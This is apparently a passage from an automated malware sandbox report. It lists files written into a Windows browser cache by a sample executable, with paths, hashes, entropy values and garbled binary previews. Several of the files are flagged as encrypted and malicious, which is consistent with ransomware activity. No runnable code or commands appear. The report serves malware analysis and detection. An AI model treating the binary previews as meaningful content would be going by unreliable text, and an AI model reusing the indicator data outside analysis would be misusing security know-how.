                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..C3....R..kd6.+=....{.....1....y[..]..."..%=.b$...kt..H..0OU.._!......M02S..l3O.fzE.....f2...V...G.z.>j......-.`*.x..:.&s....5..-...o.....ybR8H..,.....2.:....R-+O.eQ5.}.}.7]+......l....ap.$.#.\....jT/E.....C."...HZ.'Y.R(...r......K...i.X...=.l.:..w..u?.:+U.W.@E.....:.E..(]tHH......&Ov.b.i0^..%(...o.wX...uT.NS..9..X...........x..i.]...5.{..V.......w.. ..> ....0k....../.'.5.rn.Os^.vn...zeQ}0...!Hf.`...NF.....V.G..t.. ../..t..8..GQ?!.A.g.....qG..jJ........vki.=...h:.. ....y..?..S...ak#..,..wS....\. .h..L.%.W......"........?..U^...i5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\icon-youtube[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3459
                                                                                                                                                                                                    Entropy (8bit):7.940182747758011
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:gbpdVClKEX9b+O/yW1i/rVOM0LwZfsORiNbdMnTDbF00xXLI3bCd3vvkSbYJMu3H:gbJClR+AhUrVN3qKiN6/iAbAuVw9H
                                                                                                                                                                                                    MD5:56578B8F4CB0056D2C30B9EE29E247AE
                                                                                                                                                                                                    SHA1:DA3D5D83C7F0DE997086C6FBBCC40B6A98FAC133
                                                                                                                                                                                                    SHA-256:D8C602453CA138D0F5135AA5D9F98A50D873EBE229BA31FE2E4D75EA204A148A
                                                                                                                                                                                                    SHA-512:B47D82437FFC44DACA9D22546DE46E6463B4C1F7E04C219A7E1E9179FD8FA307821C3298CE7DB2023064071CBBE1721F34EB949C2CC702AFBDB872ACA23F9A11
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .|8...t..e..p.SE..BmnP,pN.OiQ..Y...'!4>.......%@...@.....R....*n.M..... ...6...g.# .8...}.*.,..(..................IN.1......[..=..&J.5.......=...V)x....R.%.`....1Q'b....5.s.g$...i....ajp<.P..V........ .#mT..9@..9.YS1...b....ajc.. 1..Kx...N....D..4.K'.....E../t.a.7..3Z..(.>{Hw.G...5.c..2(.:.K.t0cw..pc..i..9O.Tb...V.L........<+\H..O@..a.SEW.r..u._.H.;..q.......*...8H.Z.8....y......:........,.b...{.V.6.....P..6.Y<....{$...N.....P.m..5....f[+........{.G=.....$.G.W7....`x..(....J.p.,.^.....t...07.v8..."U..i....c..D..j.$x...z....&...).{...W...M"..)..../a...."...:s..n`...G?*.4...AQ.wX;...@D.XH.....x....FF....=...j......!...1.d.N.aU[..4..F..f(q.O..y.LS..rs.E..g.!O..6....ql...F...G..S|.0..o.W...Q....NL........f-...\.AL.Z...<.".4~..4{.l.{.1.v.....I...>Nh..b...{?o=...Q.9..5...|...*.K+<..0.qt>. Z..7./R..$(%./(..r..S.3.....Bfx.A:..k3.'J.\;..0$9......k..!.(..[.......7.?.4.#P....d...l!6^g.. q.HH.}8......_...O{....!.O$9;.%.}K,..h....$x......v?~..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\kBH4DSEA84cgV7IKw7_Bwvm2NpI[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12176
                                                                                                                                                                                                    Entropy (8bit):7.983612393861947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Lyluft+/NaoPp32r4mpcF2oMgJ8xL9c1a0TrlWesfnGEH637KPtoDd0GbSqB:8uloPu4GcF2dHBc15TgesfhH6F5LbB
                                                                                                                                                                                                    MD5:20DB6F181FA65DC8D767FE91DACDE139
                                                                                                                                                                                                    SHA1:0734BA20CAC78324AB5140BA97F7A48C56DDF8DC
                                                                                                                                                                                                    SHA-256:9FB8F3B0980F69ADF9E0366DFE689C9820DB0B308BF0FCB7BD7D2BAD49F56818
                                                                                                                                                                                                    SHA-512:67AA635444FF37BEA8A87CB7AE87859F0D2687F4A4F47518FBEB3701EE1DFFB1EC040FBA603AE7E01498EFD7AB085FEC7108973EA3A52CA16DBDA0B6047CE483
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >.....jb#R..NH}.f.7q.....Y.RU9...k...6..?....q..A=.]5.....t....kx...n..@....Qz+_.^...3Q-.....'...A.*....X.%H..$...L^\.4.sXR.{as.LQ....H....Ah...[;U;:n.pR;*...y.R...%.n%.+..)...5..X...v.X.=j.W".@Q...&\.i.tq.N8....f?hh..\...0A..z.$.K........j}Y....g...QD...[.........z....H.^..2..f..._.W."]Q.8i}.j.7.p..$...^....SF.......7.Sfq.....t.6.#._ ..j.....Z9..g.Un.$.#./..\e.xN..-.k<..g1r2.c..H...i....<...].d~....].}~.9.].n2/*th..`....&....EKm+_..}.5....Q-....w......@...A....E.h..R......[......k...aV}..9f2.O.B..p'..^..R;..Z...0...ku@.-&.h.1..4...A3cL2.....b...s/O..^...3.._+d>.{..#.).S.m7.E.N..:..d.......=..Q..ak.v..f.. .......Q....I.\xT."U..I..f.]R..v#\I.....t.....*.x;mE..-.&4..(....=....t..Dul...3...M...2{.u..f.AL9....~Je.l..O..vt.W.X_.se....a.bBq..R.f...+.y..lV...8|*J.ONFY.-oW.).l...f.d..3Q.].-..,p.......%..........D..k....b.%_.e..Q...uSun.n`.(.u..A..f.v0.h".w....P.ST..0.z....^...0.M.....JWTX."..j.}.t.#.*J.....l#..u.TJz..Q.0..F._..Vl.. r......K.e.O...bI..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\main.v2.min[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):70455
                                                                                                                                                                                                    Entropy (8bit):7.997631937098716
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:RPyxxnTV0/GZAAfQQgIrfptpI8eUO2S44Z7RPe36si642pA1g9hR97sPr6g:cxxTK/ggSBg8eUoRZtWKsjA1g/fhg
                                                                                                                                                                                                    MD5:4BC686F49BCA4843F0BAA61EBD4334B0
                                                                                                                                                                                                    SHA1:3117B5A57C8E40EF1275386B00DC401E9ACE6E5B
                                                                                                                                                                                                    SHA-256:404040D5655BBE432662769581EEF032411DA4F8C4B44954A0B1CCEDD53D566A
                                                                                                                                                                                                    SHA-512:C1EC2052AD4070ABAD331C8F3BE301D9BD3811E74D2F1D74406D339E2CBBD0B17AA94B72E5AB86F768999E6DEBE393BDB1F7F0FBE9DA198201AA19E3E984D8E9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .`l...BS....&.p...gh..D/.o~"...!..a...'JP...|...h.]B..8..1U.`.H..'..$4...U.z.x...?.6.Np..~.l&....S.GO.8...`.._.$.145.Mqa....r....8..V...PD89....Nxu.p.&X..S..8..[....VB.#!q.S..LS.}.;..VY<.Q)*......}.z....`OZT.t......&.55.%.i+ ..y.R.......f.dD..{.......5S..m.s..W.+2.r.oLhMnf.X!..S...884....t.l .RI.dIF....%/g...r(.+..D<}....H...2......p...M+g.b...m....O.t{..Dr.W......X....lQ....2......?".s...I.....[......t.0.pp..cy...6.!......m.c.'^.:......Z[......................b#....2;.T._..42..{.wc8&..&.?........b..!.....<....i .....4.......))A.;....s..I...TD.....gR..Ls..m.....w..b.n%.*X..c&...............PKA36..VL.'DP^.i..."!...L..z.|/.]O.{..t.8..."..C(#c.......r].....\.......,5.p&.kp...`....."...?.u........n......,..>........v.]7..Y....e.a.=+..S.j....v."_...'@.X)7../....0...=Q?.Z.sZu.a....X"....S.k..;HUlJ.|...t..zHh$.B.T<...O........#......iaXFhp..g._gp...B.;+Y.t.a)./.....6W...K.{.*&$.)..$... ..".....VA...M.o........#[.p9^...@.C.7.T...3U.8s,B.<..oYKK6.....s;..^.G...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\main.v3.min[1].css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:MPEG ADTS, AAC, v4 Main, 24 kHz, stereo + center
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):140001
                                                                                                                                                                                                    Entropy (8bit):7.998430131891138
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:WVsefso1feXF25YXvLQPxXmFTqlABtkZbKlXctIMZ784jcmJo:EfJ1UXzAEptEbSoosTo
                                                                                                                                                                                                    MD5:6DB65EEC1E23BE0E2512FC0C2E55A9F4
                                                                                                                                                                                                    SHA1:5015A1F1C7A4D80C6F52D2D5CD0091D2C916904A
                                                                                                                                                                                                    SHA-256:D06FC37D313ED68954DF5F35EFD5B2891F24B78189778FC48F302CAFB21F8C87
                                                                                                                                                                                                    SHA-512:88203F3E70C7E9D6115AD5897D583E7A425488F118303B4CBF96E84BFC5E22FCC857F41F7664FAB1C602C1F42326819494CFB5561B0EC6FD524E06CACDB35D1A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...........P(iN.)....?6..k.....q`d...m.z>li.z....prL..cRA.j.zu7.......`n.+..f...H.n.6..MH....&.'4vc.[..."...GCi..:.dZgN.]..`...G...'..*$......%...r-....J.aP..D.x.5....ZZut...H..MA.HH...dl............@.....g....?0....H.....T.JD.w.%...<h6|..].]...w...|..4.O.L.........7.N...M..;.....#.R....u.5.hqt...s..`i.wa..y....)R..2......j/..p...'.....uz....*e..~....x.......SD.;.~..p?....).a+...9..D.}....>...MY....5..]..b^..x.)}......Y.$....)..~B.u\..y.B.i....E..H.{.|..8.7. ..M.\..[.|.....b..4......9!...H..A...4.%.<\...)...iU..E..{.K.!U8..e.4=Ct.-.!..;0.m.<.x...>...6.....1=7...9. .O.7...F'.!3X...AG5 ....@.K=........=.B2P...NiT....@.k.*.Y.uMb....>.....M8h....../kh...r.]R..R.....).#a_.............GM.h6.E>1...r...4F.%...q8,.%.m@...[..!.M.\..w..q^g!+.....n.b}......G......8...._.8Y..{...#.Q_3...d.:.....s...c...5.3L...........+........yy.)C..u5!.4....o..Al..so^gn..v...v...o|;...v.......u#....~...Rw.x-..:.L.k.9..(.....F;!..na..p..HKhh..4..X.a..wv-k..VR[Y
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\mwf-main.min[1].css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99876723940213
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:+MRxXIwOb8YQapUNSTRGwhLF83cFRjUilcXlfNwtI:+M7Xab81apUNuR7LFBCilElfGI
                                                                                                                                                                                                    MD5:41B1A50F75B7A9B4EF442EA953F9073D
                                                                                                                                                                                                    SHA1:E9589292FF378E7CEFD3FFBB4CF101B9FD923E6B
                                                                                                                                                                                                    SHA-256:37C65AD5DA447E4522FA53718D4F5842EED6565BB51D70290341E6900C154208
                                                                                                                                                                                                    SHA-512:C1E5D52DD05F422C3C7C908480F78149C0D4BBEAD703B8D81F8DE263A12ACB65A7C3D17049198AB00C7E2021B6F7858917BAB63608E4EC47C21A3E0DCE57D4A3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .(...\.I....g.."..p.......L:......?. +j..\s....R.*1....V.0Y... ..f..f.%QU.]8.....$..-..crb..$.M.E...o_6.i...3.cF....U...D.I7i....n.4$.....(K.....SD..5^.f.*f..r|....#=.............|.G.Z...e........_4o....:._q.Sy...B.b.5...&N2U.....g......@...{|.*...<.*,.~.\K...B...D%k.(.Y.d...E.f.K*.I.=...J:....9.X..gs.[g..?c~.h..j...f.4..F..}\g....C.E...I..w....m].....M.3.aF.......-X..2.p...l..B.-k8%....fU]%...N`o[%..1CuME.".\Q..qjY.R.V..`)..J..j.k......0@.....E6......&.FZ..|P._.+.....k.lV...l.....v..k.i....J5.....|.:.....X:M~..wPr_.........b%..-?}.B..NE.O.fp.%5.+..1.......N............r.6..k........Q}:./.Ff3B..Y.....v.mK.)...I..V.B.p!.K..U5H..+./)....[.L.+....X....,...~$B@.4~y)....8W.I...E...K.r......@.kY.I.U8o..`F....$..l...o0wm..F..-l..'].3..H..1_.u..4w....J..\.].5}V..Im*..1...H..!.y.=.9...fx..C.fe..I.C...{..R:u....V&...5N...........x.z....M+.<..b..|...y..*....xy..[...s..z...8C.C..t.'.-=SoN..u`...}.'q....,......H.....j...7b. ...o.ps......jV...&r.`.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\mwfmdl2-v3.07[1].woff
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22705
                                                                                                                                                                                                    Entropy (8bit):7.991631655598063
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:dHbvYYnSk7Al5pDN96BT9T2HSGG6PxbC4FWilvG3VZ57JSx91EyDd1VzKL4WPpeZ:+ISkENsl6PxlROfBAx9VDtKLgNmc
                                                                                                                                                                                                    MD5:956BDD30CD4C6440AB88F151E349AD10
                                                                                                                                                                                                    SHA1:BF162D5E85FCE7E8741AAEAC31C252ECE17E4B75
                                                                                                                                                                                                    SHA-256:1E0C9B2F5A24DD9E0EE656B49B1B72A0C70B23D8E7D9668B5A1D3682A21D23CF
                                                                                                                                                                                                    SHA-512:5E0B9AD8BDE1934AEDAFE4DFF4CAB439DF355DFD1E21444C7831CCC57E1E3D6A505235624EA41191AA2164BDEBCD40A89CAAF26E1E3B9495B59DD243A3117B21
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .`.6. 6.?w.T..-..[..t......!T.Ml..p....+B.I)"..]..W.......@.....!.x..dQ..j.y......!...1N.3v..x..hA+...LD...{.....b..[;..).....s.B...W.%H'Yf....]|.G.&q~I..pW.....:..j.G.T2...2.3..{.i.o.f}..i.0f. ]..n.B&CN+E.......:..W..+./..ZJ.)...&....7....q..'.{!3)..q,.Y.g[..1*. .>Y$].......m...Bb.B...I.nR..":Vj..`.T.RR..Lu.?.:.%H.3.....|kQ....bf.R#I.....]_..o_t]e.Jo...k...p{|..1.J..e.7i..KY....Y...?yy).bf...>-.gGV<....4.)....1.o.|.>Y.i.U....+\B.(...4....*@.A88C......+....$K.8.Y?..3*..o.<.l.....3...$~+.......>.}kv.....3.G.....N..q5....r..M..C.[...k..........(.2.i[....m.......(.P.,..L....C.?*#A..F...0.a....p........ ......U.8{..=.W...Rh..(..d~..2.......D..E..}...q.7.Mp.a S.].h.\.xibR<..1*..M..<.....Z...../N.....#....@C.....v8..f...R2.eHT..S....B..2.0..n.{.......Q.z.a}T..6..v...F..x7*...W.L=..5ka.AK..F.0C\z.$.a..@S.H.S...[.....j.E.:S@:....z.Rk.........=...Yy.{...p{...1...@.f.o....O...d`w...\p..2Xy..8.V.M....4S..opC......$.IG\.4q...-..T.2...w...^..=...1.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\n1U5gwBiwMo7s-fWOh2kSe3Kils[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12423
                                                                                                                                                                                                    Entropy (8bit):7.9862931673815805
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:XKgTH2OEEpirdr5oJaTg0tIUKSgjgK5aQK7Zi1:HCOkJ5dT5nKocaBK
                                                                                                                                                                                                    MD5:47FD53DA72D441D5B7486278682DEF6A
                                                                                                                                                                                                    SHA1:89749756C1A2F1FAACC06D71C4202D478CF1AD91
                                                                                                                                                                                                    SHA-256:12E39E457282B12240088903795DA923BFA51324703F6319D415479E59EAD337
                                                                                                                                                                                                    SHA-512:FA27678E3B2ABA9802C4CF4E84F61C4E4096249651CABAD82E3C7B4C87029A7888992A98BDD89257E3AE1B052DB8986465A70380DFA7828ADEFD79AF62794543
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: (e........0...Gr..cM[..@Xe.|...9..tB2..u......1..O...*s+.`t...d?..3n0..."..S.T%....\.S..%W.3.....6$.../.Nh.S...D....@Mu...e(..>4.^d...<_............$.......P.[.+.....v...h. .&9..]......9k .DD..n....$y.."...s ...Q.Tx-.P.G0.b%.\\......c..O}j.~.j.....$...C..9dP...[..p.....<..+.....~.......y.r...%$.Y..$....2.t ..9={...e}...Sk...........o.....Z.2.B..c.[.0..H......c...0.O.[.......E...IrJ&L..)...!j.k%m../.Z..D..Zkf{*P..I^..V.....8..=.F.....JV.xw....M9....&....1._...."O66...v\d..{..1........*.4.3..V@\.)....PVo.n3[.-.+L.Qv...D....D..."dp:.WfF...c.S...K.8..g....a.3...........3.. .s.a....PXGX.m+`R&.h..H.5CR..5..j:`~RO...}.#......v.O..A..c.S...S......,<*.H..h.]...&.....a_R]...N..-....$.:......o.v'YY.....t...zU}..l.....>..6.D..m...L........@....e.=../...!...Op.+U...n.c-3.T..!.8....h.8...K....;.....Fh._2.O....9-...P../.F>.."!.;gh....a.......<.YF...b.'..c......9.i.U].hup..*.-H+i%....8:.....Z....s..s...L.I'x.&:..f.q.{.......|....K.q..0...9
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\nrrV18753[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):98366
                                                                                                                                                                                                    Entropy (8bit):7.9982970871250965
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:JxOAqdbbWoQ6bHdI42FJ/pmqrDSdRsTmp2zLDjTFOymrXHxeJbp1O8kAHd:MVbWsrdZ7QSdCTe2zrTFbmTkp1O8kCd
                                                                                                                                                                                                    MD5:6AF6990FDC096C92371B6CAB3D56AE87
                                                                                                                                                                                                    SHA1:1269DA1510BA40B14110E42DBA197A3C01D39347
                                                                                                                                                                                                    SHA-256:767053DCD690DB8DD57ED7A9F50B8D72C455FC98A1ED89D36BA27C45182E5B26
                                                                                                                                                                                                    SHA-512:26D22B85407D6AE7128191BBB5FAD4CC0CCC9DD803722C3B05706E8C889126AC9D6B5AC8C4A34B38232E7070F972CCA184B04422F2098FC5E4E33D93D0C54A5C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sel..81.X..F3...y.U...=..Y...7......ar\.M9..R](...x..hb.8..1A.5G...P...ib...b...]Ff|..|K.U.W...>W.1.ux......&b..../D>r..{..i.;...! .......Oc.>.[x.....S...a..,.B.<4n.3....V.B .8u)....W.-.g....>.4I@.6.Q..4#....:.R...6..."w.}/......qoqe@.d/$5.9...... c....&`.o7.3.V.2M..n._wT..1..Z.5.4?......C...I..\..".ZH.=I..vK.W7...!Q.....r..{.......`n.K.H.5B....f....G.Z.,g..,..k...g..x..,j...%.V..N....$}y..?5l....;.P...r/...*l..0-. .b..}u...s.+y...Rs...@.R.8TN...[; 3.i...\..b........L..BO.}%...).x0.?Q.....8..t.WY8Z0..'..W]s.QA].=.X.Vf..-R..!...q:@+r5...Z.q.g......x.&O...yb.......;.k.|.Fv.$.a}..|.{v..28..:......(...,e.C.\.......(0Lf... ...EzH.Wq]..T..o.U.....j,..~...dp.F.5...'.E..a.K..#...........;....3M...\....'...@..[p..Ot.K.1#CX.,....:n..20.;W.....coW.c..$....|Z..H/Q..D^1g.w.C....:Rg..@L.....t...ws92..J....>.....g.o.b.qI.c..W.i=.g.....5..c...hj..#/.o....r[.....<UH..!...K....$Y$.n...M.N.dv/.tO\.. ..GQV..m.F.....e.+R....@.....gR.^..#..|B.m~....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\otBannerSdk[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998847013492655
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:+o0MVW0LJGlreeajh6gXRy6AP7uFLsiN9Q3xrY6ocnCk4K:+o0Mw+4lqeu6Y3AP7uFLjNC3xr1C+
                                                                                                                                                                                                    MD5:F4E68991A8F3EA003561B5B443EFA18D
                                                                                                                                                                                                    SHA1:BA58B061FBF76342FE3089F836C88C117099FACD
                                                                                                                                                                                                    SHA-256:15868929B904ED31230A86EEB4E339A3EA11D9172F7A660E7498421720E5A5EB
                                                                                                                                                                                                    SHA-512:D1C26BB5BE7943F67BD255880343E5879EE1D10E00B2C350E431E1C81B9B2585EB72BDA5ED7F3ACD2CBA9C3EF05306403A261CC06359C873B363BBBECCB8CB82
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: q'.;2/..[.Ly.<...X~..~......f...(..l..=!I6.-.mu.F.g._..L....-..B..........xf.E...........q.{..P.<l......4.....l.S.D.8?........g./F1.J.W%x..4LHH...H?....l.kH.I..t).)J..._..T...3u....($$.Y2.mD...q..aw0An;]..0.u:..#.....n.....|..p.C$]...IY(...-u..84=z"nR)*;.Ban...<.`yS..5:}..I..L[..k..?5"...k.&....{i.A..o..!.[...9<H.g...Z.LA.I.[..U`...u...<.).[#th...W.=.........d..u...xa.p^.....s<~....4.....B.7=W....>..d"...D.I.83...>}.....B........&.C:..TR@.......0y@).....D.|...#..D.f.K.~.=gz...6.....p.B...^VVX....9.^..,9....:z4.=...X.tr...2ES.._hR...L..... ....C)..E...a..N.\nu...C.;_.GPj..:.3T..M.?.tV....h.[H..4.E!..2.Aj..J..c8"g..U....f.M....'.B0..SR.3...`.'-q.....'....l.\.....x.....<..`p..._.,...M#.6...C.H[....._.~..h..R.C0..O#I. I7{O?...S.....rBC..9..*`.2.dz..Z.......Q.q.Mn....q3.......'....>N.N.........w.B.....n.W..$.I(........@.X..[.!g;....j.....A..!&.._........K..j.'..}.......O5s.f;.......JPK.y8Z.<,.;....k.0Xo....)<...E1....m....N.b.N.y.2...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\override[1].css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1860
                                                                                                                                                                                                    Entropy (8bit):7.88527762167361
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:U81NHVraOVfSu63CaQP2usDAkhMUwIAln+kQ+D:U81fraOVaugCa9DPh6ln+kQG
                                                                                                                                                                                                    MD5:02EEA489E92E5DA25EA8F056F33A6107
                                                                                                                                                                                                    SHA1:D7DEF2238A9E24F521AC510B483D94C8205C3510
                                                                                                                                                                                                    SHA-256:CA6356912FE45E38D6959CB55DF7AC73848346B203C6347AEB599236215991DB
                                                                                                                                                                                                    SHA-512:5AE0C07F961C2F43F4210563528C6100DB5A33C4D42649FCE77D76AFB1DF02A9C7777910E7DE6BA63078F7F3CE856001078B9153CB0EECFDB0B643B417DD96D8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]....c..H......;...]. .p..R<)N.M........ x.{....v.iZ.0......+.0.t.._..:....I.......{...<..;v-.l........+...X.t.z9.#=...#.1'eVxh|.p.I.....3..L.......` 7.....,.(........*cv..;p...-,O..S.jY....8...VX...i..T./..*..Z..........g.e....'..t.C..}..Ipp......z..n*.tYy......`.D. .TB..Tf'Wja14....t.A,.q...-x.b.`.......=.j:p..t..i .0A..=i.bOC...L.Lk.h..R......w.J.M...a.a...u.._.Ww......6.W..bYR),.!..K.5..|K.w..p1v.N......6.S!..z}-.......2zFR.x.w..B1...u....V......0.4K$v.D.RQ.N].......d`../.....F....[D....Mt..<...D..8J..J..(..^Qbn .U.-Sf.......W5....zj`{..Nq1G.*z.\-.....;.....6..Z.0w...z]w...2...Y..I.....(..+y .F...'{Li....^..u....*.r.q...1U..z.),c8...M9A......H.E.......y.....q.....F...e../........$.G...~^.X.?.g.....$C...&1......&...E2.....8.....7.WlC*{$.a...,..K.:.]H...~./. ....8F....4.].F.y...+..d...7_.3C.y.RW=.?...g..?.GC 3...x..R..~7.2.h.w.}.X...>.g.C.."..,n.<..w`*.4BE.).K..qX...lRB3_.;p...5..d'/.d..o=....o..N........9./......~mS.2.m?..h.KOD....a..._~` .P.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qNpEAsGCLUb2B0s0naI1CmTvm1o.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:floppy image data (IBM SaveDskF, old)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):832
                                                                                                                                                                                                    Entropy (8bit):7.740576069445867
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:jffVjKr+o+7YtYHNMp3sXtG7YiuS9vXjnfPN1vfSqnSk6zp5ObttFF8eHUnDnlgH:dKr+ZYtN/1/fSqnSkoObt6eHGxgXbD
                                                                                                                                                                                                    MD5:AA73DA9823474609E4475EF325B9AB81
                                                                                                                                                                                                    SHA1:B473D8DD1DA375245B42B0672BC646AA4982F782
                                                                                                                                                                                                    SHA-256:407BABBA4AC25A1073E98BA3516C33D92FDD02B1002D6F4D562E71CAD3BE877E
                                                                                                                                                                                                    SHA-512:2AD5563FEBC5BAB949AF9AB2846A2C9CFA630A82A94F8CA65B4F647DF8A5C61BE0A7B3B4A8F7738C74F489377AA1B7E869D91DFF4913962185DF945D6E37E7DD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .X~.{....WU<..p....0.s..r6.0.../d.gqA....gP.#.To4..*....U$!.C.m^s...."...tVS.K(.z..9Np.<S......Gl.Up..w.!.8%ZZ.Y..L....}...#.....,..M....C.~...I.2*,.02E...,....Y..(.-r.H.[8j..:......Y(...x...W|?.'V7X.[.M...=#..^..*.'.O&..u%..h..D.x...wRN....i...y....J..T...jX.D...ew9.[.a....2.w....p.s.2..Q.w...u...32.F....h..T...1.lG...C.\..TJ.^r....y..m:..D.&_~~.6.t...1.....Q.R(..........zZ..7.K..f..@^.~..*.j(f.0.<........_.a....."ST.a...\}Ne#.TA...=.....Yz...`.A....Z.Vp;...|._\..O...Ot..U.?.+......?............V.1d....B.X..1Zo9#.D...c)0PY..M....D....+4..z.|....t..p...."fs|.. 9G..)..K>.9.XS...2..G...Q~|...;...#g'0.3.k...s.....t.R.4./X.97.OAv..V`.....1.....[x+..s........r]C..yB.f!...t.T....X..\...}|..:gt*d...>l.>5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\qsml[1].htm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):795
                                                                                                                                                                                                    Entropy (8bit):7.726735198051792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6GdoykvmbI2eJ5ntWzX/TiXVOwFwD+xCPbD:6woy2mbiTntA0V7acCTD
                                                                                                                                                                                                    MD5:DD441A6E405E799213F3371A1B0B46AA
                                                                                                                                                                                                    SHA1:D7A9E5E261741013D04CC35809498B69943D3159
                                                                                                                                                                                                    SHA-256:67C76D32DCF82E1A885B4AA05B2D5EC91651C36DB4E6079B7951684B2A5865E9
